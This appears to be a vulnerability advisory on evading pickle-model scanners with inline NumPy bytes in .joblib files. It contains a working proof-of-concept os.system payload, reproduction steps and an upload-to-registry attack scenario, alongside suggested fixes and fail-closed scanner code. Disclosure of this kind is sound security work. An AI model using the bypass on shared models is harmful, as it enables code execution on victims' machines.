Joblib Scanner Bypass via Inline NumPy Array Bytes
Summary
A malicious .joblib file containing an os.system RCE payload is detected by 0 of 4 scanners (picklescan, modelscan, modelaudit, and a local ClamAV install), yet it executes arbitrary commands on joblib.load(). The evasion requires no payload obfuscation: the dangerous os.system global is present in plaintext opcodes. The pickle scanners never reach it, because inline raw NumPy array bytes cause a mid-stream parse failure that they treat as "clean". ClamAV misses it for a different reason: its relevant signatures are gated on ZIP/torch containers.
Affected scanners: picklescan 1.0.4, modelscan 0.8.8, modelaudit 0.2.45, ClamAV 1.5.2
Affected format: Joblib (.joblib), uncompressed standard format
Impact: Arbitrary code execution at model load time, bypassing ProtectAI's ModelScan safety scan
Environment: Python 3.14.5, joblib 1.5.3, numpy 2.4.6, scikit-learn 1.8.0
Vulnerability
Root Cause
joblib's NumpyPickler serializes NumPy arrays by writing the raw array bytes inline in the pickle stream, between standard pickle opcodes. joblib's NumpyUnpickler knows how to skip past these bytes. It overrides the BUILD opcode handler so that, when the object just built is a NumpyArrayWrapper, the wrapper reads the raw array bytes (via read_array()) and advances the file cursor past them. Pickle scanners, however, use pickletools.genops or equivalent opcode walkers that are not aware of these inline bytes. When the walker reaches the first raw byte mid-stream, it interprets that byte as a pickle opcode and fails with a ValueError. The scanner then silently returns "clean" instead of flagging the parse failure.
If an attacker places a malicious __reduce__ object after a NumPy array in pickle traversal order, the scanner aborts before reaching the malicious opcodes. The loader processes the entire file correctly, executing the payload.
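The writer/loader asymmetry can be reproduced with the standard library alone. The sketch below is a toy model of the mechanism, not joblib's code. `RawBlob`, `InlinePickler`, `InlineUnpickler`, `inline_dumps` and `naive_scan` are hypothetical names, and a `bytearray` stands in for an ndarray. A harmless string takes the place of the malicious object. Like joblib, the sketch builds on the pure-Python `pickle._Pickler`/`pickle._Unpickler` classes. The writer emits payload bytes raw after the opcodes ending in BUILD. The loader's BUILD override consumes those bytes, while a fail-open `pickletools.genops` walker stops at the first raw byte.

```python
import io
import pickle
import pickletools


class RawBlob:
    """Hypothetical stand-in for joblib's NumpyArrayWrapper; records only a length."""

    def __init__(self, size=0):
        self.size = size


class InlinePickler(pickle._Pickler):
    """Toy writer: a bytearray is saved as a RawBlob whose payload follows it raw."""

    def __init__(self, file, protocol=4):
        super().__init__(file, protocol=protocol)
        self.file_handle = file

    def save(self, obj, save_persistent_id=True):
        if isinstance(obj, bytearray):
            super().save(RawBlob(len(obj)))       # ordinary opcodes, ending in BUILD
            self.framer.commit_frame(force=True)  # flush the current frame to the file
            self.file_handle.write(bytes(obj))    # raw payload bytes, NOT opcodes
            return
        super().save(obj, save_persistent_id)


class InlineUnpickler(pickle._Unpickler):
    """Toy loader: after BUILD produces a RawBlob, read its payload off the file."""

    dispatch = pickle._Unpickler.dispatch.copy()

    def __init__(self, file):
        super().__init__(file)
        self.file_handle = file

    def load_build(self):
        pickle._Unpickler.load_build(self)
        if isinstance(self.stack[-1], RawBlob):
            blob = self.stack.pop()
            self.stack.append(bytearray(self.file_handle.read(blob.size)))

    dispatch[pickle.BUILD[0]] = load_build


def inline_dumps(obj):
    buf = io.BytesIO()
    InlinePickler(buf).dump(obj)
    return buf.getvalue()


def naive_scan(data):
    """Fail-open walker: collects string arguments and stops quietly on error."""
    seen = []
    try:
        for _opcode, arg, _pos in pickletools.genops(data):
            if isinstance(arg, str):
                seen.append(arg)
    except ValueError as exc:
        return seen, f"aborted: {exc}"
    return seen, "complete"


data = inline_dumps((bytearray(b"\x00" * 8), "after-the-blob"))
seen, status = naive_scan(data)
print(status)                      # reports the unknown opcode at the first raw byte
print("after-the-blob" in seen)    # False: everything after the blob is unseen
print(InlineUnpickler(io.BytesIO(data)).load())  # the loader recovers both items
```

In the report's scenario, the object after the array is a `__reduce__` payload rather than a string, so the walker never sees its global or REDUCE opcode.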
Attack Requirements
- A pickle container (tuple, list, dict, or nested) serialized via joblib.dump
- At least one NumPy ndarray (any non-object dtype, ≥1 element) positioned before the malicious object in pickle traversal order
- A malicious object whose __reduce__ returns a dangerous callable (e.g., os.system)
Why This Is Not the Known Joblib Compression Bypass
The previously reported joblib bypass (PickleCloak Appendix B.1) involves compressed joblib files where the compression magic bytes at position 0 cause scanners to fail immediately. This bypass uses uncompressed, standard-format joblib files. The parse failure occurs mid-stream due to inline NumPy array bytes, not at the start of the file. The mechanism is fundamentally different.
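To tell which case a given file falls into, look at its first bytes. The sketch below uses `describe_header`, a hypothetical helper rather than a scanner. It relies on one fact of the pickle format: protocol 2+ streams begin with the PROTO opcode (0x80) followed by a version byte. Only the gzip magic number is checked, as an example; other compressors have their own magic bytes. An uncompressed joblib file passes the PROTO check, so a scanner failure on such a file must come from later in the stream.

```python
import gzip
import pickle


def describe_header(head: bytes) -> str:
    """Hypothetical triage of a file's first bytes (a hint, not a verdict)."""
    # Pickle protocol 2+ streams start with PROTO (0x80) and the protocol number.
    if len(head) >= 2 and head[0] == 0x80 and 2 <= head[1] <= pickle.HIGHEST_PROTOCOL:
        return f"uncompressed pickle (protocol {head[1]})"
    # gzip magic number; other compressors use different magic bytes.
    if head[:2] == b"\x1f\x8b":
        return "gzip-compressed"
    return "unrecognized header"


print(describe_header(pickle.dumps([1.0], protocol=4)[:2]))  # uncompressed pickle (protocol 4)
print(describe_header(gzip.compress(b"payload")[:2]))        # gzip-compressed
```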
Files
| File | Description |
|---|---|
| malicious_model.joblib | PoC: fitted LinearRegression + malicious CustomLR in a tuple (648 bytes) |
| poc_generate.py | Generates the malicious .joblib file |
| poc_verify.py | Scans with all scanners and loads to confirm RCE |
| generalized_poc.py | 8 additional variants proving generalization (no sklearn needed) |
Reproduction
Step 1: Install dependencies
```bash
pip install joblib numpy scikit-learn picklescan modelscan modelaudit fickling
```
Step 2: Generate the PoC (or use the provided malicious_model.joblib)
```bash
python poc_generate.py
```
Step 3: Scan and observe that all scanners report clean
```bash
picklescan --path malicious_model.joblib
# Expected: 0 infected files, 0 dangerous globals
modelscan -p malicious_model.joblib
# Expected: No issues found
python -c "
from modelaudit.core import scan_model_directory_or_file
result = scan_model_directory_or_file('malicious_model.joblib')
print('malicious:', result.get('malicious', False))
print('verdict:', result.get('pickle_verdict', False))
"
# Expected: malicious: False, verdict: False
```
Step 4: Load and observe code execution
```bash
python -c "import joblib; joblib.load('malicious_model.joblib')"
# Expected output includes: This is a malicious payload!
```
Step 5: Verify with controls
```bash
python poc_verify.py
# Runs the full matrix: bypass cases (clean) vs. control cases (detected)
```
Scanner Results
Bypass case: (fitted_LinearRegression, malicious_CustomLR)
| Scanner | Version | Verdict | Detects os.system? |
|---|---|---|---|
| picklescan | 1.0.4 | 0 infected | No: parse aborts before reaching REDUCE |
| modelscan | 0.8.8 | No issues found | No: parse aborts silently |
| modelaudit | 0.2.45 | malicious: False | No: logs a WARNING, but the verdict stays safe |
| fickling | 0.1.11 | LIKELY_OVERTLY_MALICIOUS | No: flags NumpyArrayWrapper (fires on ALL fitted joblib files, including benign ones) |
| ClamAV | 1.5.2 | CLEAN | No: signatures are gated on ZIP/torch containers |
Control case: (malicious_CustomLR, fitted_LinearRegression), i.e. reversed tuple order
| Scanner | Version | Verdict | Detects os.system? |
|---|---|---|---|
| picklescan | 1.0.4 | Dangerous | Yes: REDUCE precedes array bytes |
| modelscan | 0.8.8 | No issues found | No: modelscan is fail-open even when a dangerous global was already observed |
| modelaudit | 0.2.45 | CRITICAL | Yes: REDUCE precedes array bytes |
Note: modelscan appears fail-open on parse abort regardless of prior findings. This is a separate issue.
Generalization
The bypass does NOT require scikit-learn, fitted models, or any specific container shape. Minimal example:
```python
import numpy as np
import joblib


class Detonator:
    def __reduce__(self):
        import os
        return (os.system, ('echo PWNED',))


# Any (non-object-dtype) NumPy array placed before the malicious object triggers the bypass
joblib.dump((np.array([1.0]), Detonator()), 'minimal_bypass.joblib')
# Scanners: clean. Loader: executes 'echo PWNED'
```
Tested container shapes (each bypasses 4 of the 5 scanners):
- (np.array([1.0]), Detonator())
- [np.array([1.0, 2.0, 3.0]), Detonator()]
- {"data": np.array([1.0]), "evil": Detonator()}
- {"outer": (np.array([1.0]), Detonator())}
- (np.zeros(10, dtype=np.int64), Detonator())
Real-World Impact
Any fitted scikit-learn model saved with joblib.dump can carry this bypass. A fitted model contains NumPy arrays (the learned coefficients), which produce inline raw bytes. An attacker can:
- Take a legitimate fitted sklearn model
- Bundle it with a malicious __reduce__ object in a tuple
- Upload it to HuggingFace or any other model registry
- ProtectAI's ModelScan reports "No issues found"
- The victim downloads it and calls joblib.load(), triggering RCE
Suggested Fixes
For scanner maintainers (picklescan, modelscan, modelaudit):
- Fail closed on parse abort. Any mid-stream pickletools.genops exception should be treated as CRITICAL/suspicious, not silently reported as clean.
- Format-aware parsing. Recognize joblib.numpy_pickle.NumpyArrayWrapper in the opcode stream. Skip the inline raw-bytes region that follows it, as joblib's own loader does, instead of interpreting the array bytes as opcodes.
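The fail-closed policy can be sketched on top of pickletools.genops. This is not code from picklescan, modelscan or modelaudit. `DANGEROUS` and `scan_fail_closed` are hypothetical, and the denylist is deliberately tiny. STACK_GLOBAL is resolved naively from the two most recent string arguments, so memo lookups such as BINGET are not tracked. A dangerous global seen before an abort still yields "dangerous", which covers the modelscan control case. An abort with no other finding yields "suspicious" rather than "clean".

```python
import pickle
import pickletools

# Illustrative denylist only; real scanners maintain far larger lists.
DANGEROUS = {
    ("os", "system"), ("posix", "system"), ("nt", "system"),
    ("builtins", "eval"), ("builtins", "exec"), ("subprocess", "Popen"),
}


def scan_fail_closed(data: bytes) -> dict:
    """Collect imported globals; a parse abort is itself a finding, never 'clean'."""
    found = []
    strings = []  # string arguments seen so far, used to resolve STACK_GLOBAL
    status = "complete"
    try:
        for opcode, arg, _pos in pickletools.genops(data):
            if opcode.name in ("GLOBAL", "INST"):
                module, name = arg.split(" ", 1)  # genops yields "module name"
                found.append((module, name))
            elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
                # Naive: assumes the two most recent strings are module and name.
                found.append((strings[-2], strings[-1]))
            elif isinstance(arg, str):
                strings.append(arg)
    except Exception as exc:  # fail closed: record the abort instead of returning
        status = f"parse aborted: {exc}"
    hits = [g for g in found if g in DANGEROUS]
    if hits:
        verdict = "dangerous"      # keep earlier findings even if parsing aborted
    elif status != "complete":
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "status": status, "globals": found}


print(scan_fail_closed(pickle.dumps([1, 2, 3]))["verdict"])  # clean
print(scan_fail_closed(b"\x80\x04\x00")["verdict"])          # suspicious
```

As a trade-off, a policy this simple also marks every benign fitted joblib file as "suspicious", because all of them contain inline array bytes. That is why format-aware parsing complements it.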
For joblib maintainers:
- Document the inline-bytes protocol so scanner authors can implement format-aware walkers.
- Consider providing a joblib.safe_load(path, *, allowed_globals) analogous to PyTorch's torch.load(..., weights_only=True).
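joblib.safe_load does not exist today. The sketch below shows only the allowlist idea behind it, for a plain pickle stream. It uses the find_class hook that the Python pickle documentation recommends for restricting globals. `restricted_loads` is hypothetical, and `Detonator` here is a harmless variant of the report's class that calls print instead of os.system. A real joblib version would also need to allowlist the globals joblib's own array wrapper requires and to handle the inline array bytes.

```python
import io
import pickle


def restricted_loads(data: bytes, allowed_globals=frozenset()):
    """Hypothetical allowlist loader: only the listed (module, name) globals resolve."""
    allowed = frozenset(allowed_globals)

    class AllowlistUnpickler(pickle.Unpickler):
        def find_class(self, module, name):
            # Every global the stream references passes through this hook.
            if (module, name) in allowed:
                return super().find_class(module, name)
            raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowed")

    return AllowlistUnpickler(io.BytesIO(data)).load()


class Detonator:
    """Harmless variant of the report's payload: print instead of os.system."""

    def __reduce__(self):
        return (print, ("PWNED",))


print(restricted_loads(pickle.dumps([1, 2, 3])))  # [1, 2, 3]
try:
    restricted_loads(pickle.dumps(Detonator()))
except pickle.UnpicklingError as exc:
    print(exc)  # global 'builtins.print' is not allowed
```

Unlike the scanners' denylists, an allowlist fails closed by construction. Any global the caller did not anticipate is rejected before it can be called.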